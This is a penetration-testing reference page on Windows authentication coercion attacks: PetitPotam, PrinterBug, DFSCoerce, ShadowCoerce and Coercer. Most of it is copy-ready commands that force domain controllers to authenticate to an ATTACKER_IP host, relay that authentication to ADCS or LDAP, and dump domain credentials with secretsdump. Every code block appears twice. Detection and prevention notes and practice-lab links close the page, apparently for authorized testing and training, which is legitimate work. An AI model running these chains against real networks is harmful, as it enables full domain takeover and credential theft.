Exploitation

Coercion Attacks

Force Windows servers to authenticate to attacker-controlled systems, enabling NTLM relay attacks, credential capture, and privilege escalation to Domain Admin.

T1187 T1557 T1021

Danger

Coercion attacks can impact production services. PetitPotam, in particular, can cause issues with certificate services. Coordinate with the client before testing.

Attack Overview

Coercion attacks abuse Windows RPC protocols to force a target machine to authenticate to an attacker-controlled server. Combined with relay attacks, this can escalate to DA.

1. Coerce
Force auth from DC
2. Capture
Intercept NTLM auth
3. Relay
LDAP/HTTP/SMB relay
4. Escalate
DCSync or RBCD

PetitPotam (MS-EFSRPC)

Abuse the Encrypting File System Remote Protocol to force authentication. Works unauthenticated on older systems, or with any valid domain credentials.

bash 
# Unauthenticated (works on unpatched systems)
python3 PetitPotam.py ATTACKER_IP DC_IP

# Authenticated (more reliable)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# With hash
python3 PetitPotam.py -u user -hashes :NTHASH -d corp.local ATTACKER_IP DC_IP

# Combined with ADCS relay
# Terminal 1: Start relay
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: Trigger coercion
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP
# Unauthenticated (works on unpatched systems)
python3 PetitPotam.py ATTACKER_IP DC_IP

# Authenticated (more reliable)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# With hash
python3 PetitPotam.py -u user -hashes :NTHASH -d corp.local ATTACKER_IP DC_IP

# Combined with ADCS relay
# Terminal 1: Start relay
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: Trigger coercion
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

PrinterBug (MS-RPRN)

The classic "Printer Bug" abuses the Print Spooler service to trigger authentication. Requires spooler service running on target.

bash 
# Check if spooler is running
rpcdump.py DC_IP | grep -i spoolss

# Python printerbug
python3 printerbug.py corp.local/user:Password123@DC_IP ATTACKER_IP

# SpoolSample from Windows
SpoolSample.exe DC_IP ATTACKER_IP

# Coercer - Universal tool
python3 Coercer.py -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-method MS-RPRN
# Check if spooler is running
rpcdump.py DC_IP | grep -i spoolss

# Python printerbug
python3 printerbug.py corp.local/user:Password123@DC_IP ATTACKER_IP

# SpoolSample from Windows
SpoolSample.exe DC_IP ATTACKER_IP

# Coercer - Universal tool
python3 Coercer.py -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-method MS-RPRN

DFSCoerce (MS-DFSNM)

Abuse Distributed File System namespace management protocol for coercion.

bash 
# DFSCoerce
python3 dfscoerce.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Using Coercer
python3 Coercer.py -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-method MS-DFSNM
# DFSCoerce
python3 dfscoerce.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Using Coercer
python3 Coercer.py -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-method MS-DFSNM

ShadowCoerce (MS-FSRVP)

Abuse File Server VSS Agent protocol for coercion on systems with this service enabled.

bash 
# ShadowCoerce
python3 shadowcoerce.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Using Coercer
python3 Coercer.py -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-method MS-FSRVP
# ShadowCoerce
python3 shadowcoerce.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Using Coercer
python3 Coercer.py -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-method MS-FSRVP

Coercer - Universal Tool

Coercer is a comprehensive tool that tests multiple coercion methods automatically.

bash 
# Install Coercer
pip install coercer

# Scan for vulnerable methods
python3 Coercer.py scan -u user -p 'Password123' -d corp.local -t DC_IP

# Coerce using all methods
python3 Coercer.py coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP

# Filter specific protocols
python3 Coercer.py coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-protocol MS-EFSRPC,MS-RPRN

# WebDAV coercion (forces HTTP)
python3 Coercer.py coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP@80/test --filter-protocol MS-EFSRPC
# Install Coercer
pip install coercer

# Scan for vulnerable methods
python3 Coercer.py scan -u user -p 'Password123' -d corp.local -t DC_IP

# Coerce using all methods
python3 Coercer.py coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP

# Filter specific protocols
python3 Coercer.py coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP --filter-protocol MS-EFSRPC,MS-RPRN

# WebDAV coercion (forces HTTP)
python3 Coercer.py coerce -u user -p 'Password123' -d corp.local -t DC_IP -l ATTACKER_IP@80/test --filter-protocol MS-EFSRPC

Full Attack Chain: Coercion → ADCS → DCSync

Complete privilege escalation from domain user to Domain Admin using coercion and ADCS.

bash 
# Step 1: Start ntlmrelayx targeting ADCS web enrollment
ntlmrelayx.py -t http://CA_SERVER/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Step 2: Coerce DC authentication (new terminal)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Step 3: ntlmrelayx obtains certificate for DC$ account
# Save the base64 certificate output

# Step 4: Use certificate to get DC$ TGT
certipy auth -pfx dc.pfx -dc-ip DC_IP

# Step 5: DCSync with DC$ ticket
export KRB5CCNAME=dc.ccache
secretsdump.py -k -no-pass DC_IP
# Step 1: Start ntlmrelayx targeting ADCS web enrollment
ntlmrelayx.py -t http://CA_SERVER/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Step 2: Coerce DC authentication (new terminal)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Step 3: ntlmrelayx obtains certificate for DC$ account
# Save the base64 certificate output

# Step 4: Use certificate to get DC$ TGT
certipy auth -pfx dc.pfx -dc-ip DC_IP

# Step 5: DCSync with DC$ ticket
export KRB5CCNAME=dc.ccache
secretsdump.py -k -no-pass DC_IP

Alternative: Relay to LDAP for RBCD

bash 
# When ADCS isn't available, relay to LDAP for RBCD
# Requires LDAP signing not enforced

# Step 1: Create computer account
addcomputer.py -computer-name FAKE01$ -computer-pass 'Password123' corp.local/user:Password123

# Step 2: Start relay with RBCD delegation
ntlmrelayx.py -t ldap://DC_IP --delegate-access --escalate-user FAKE01$

# Step 3: Coerce authentication
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Step 4: Get service ticket via S4U
getST.py -spn cifs/DC_IP -impersonate Administrator -dc-ip DC_IP corp.local/FAKE01$:'Password123'

# Step 5: Use ticket
export KRB5CCNAME=Administrator@corp.local.ccache
secretsdump.py -k -no-pass DC_IP
# When ADCS isn't available, relay to LDAP for RBCD
# Requires LDAP signing not enforced

# Step 1: Create computer account
addcomputer.py -computer-name FAKE01$ -computer-pass 'Password123' corp.local/user:Password123

# Step 2: Start relay with RBCD delegation
ntlmrelayx.py -t ldap://DC_IP --delegate-access --escalate-user FAKE01$

# Step 3: Coerce authentication
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Step 4: Get service ticket via S4U
getST.py -spn cifs/DC_IP -impersonate Administrator -dc-ip DC_IP corp.local/FAKE01$:'Password123'

# Step 5: Use ticket
export KRB5CCNAME=Administrator@corp.local.ccache
secretsdump.py -k -no-pass DC_IP

🔍 Detection & Prevention

Blue Team Indicators

Detection Opportunities

  • • Event 4624 - Network logon from DC to unusual host
  • • SMB connections from DCs to non-standard destinations
  • • RPC calls to MS-EFSRPC, MS-RPRN, MS-DFSNM endpoints
  • • Certificate requests from machine accounts
  • • LDAP modifications (RBCD delegation)

Prevention Measures

  • • Apply KB5005413 patch (PetitPotam)
  • • Disable Print Spooler on DCs
  • • Enable LDAP signing and channel binding
  • • Enable EPA on ADCS web enrollment
  • • Block DCs from initiating outbound SMB/HTTP

Coercion Methods Reference

Method Protocol Auth Required Notes
PetitPotamMS-EFSRPCOptional*Most reliable, patched for unauth
PrinterBugMS-RPRNYesRequires Print Spooler
DFSCoerceMS-DFSNMYesWorks on most DCs
ShadowCoerceMS-FSRVPYesRequires VSS Agent
CoerceCheckerMultipleYesTests many methods

External Resources

PetitPotam - GitHub

Original PetitPotam tool

Coercer - GitHub

Universal coercion tool

DFSCoerce - GitHub

MS-DFSNM coercion

HackTricks - Coercion

Comprehensive coercion guide
🎯

Practice Labs

Practice coercion attacks in safe environments

📦
Return Hack The Box easy
PrinterBugService Abuse
Open Lab
📦
Escape Hack The Box medium
PetitPotamADCS Relay
Open Lab
🏠
Exploiting AD TryHackMe hard
CoercionNTLM Relay
Open Lab
Need help setting up? Check our Lab Setup Guide →

Related Topics

Relay Attacks

NTLM relay techniques

ADCS Attacks

Certificate-based attacks

Credential Attacks

Credential capture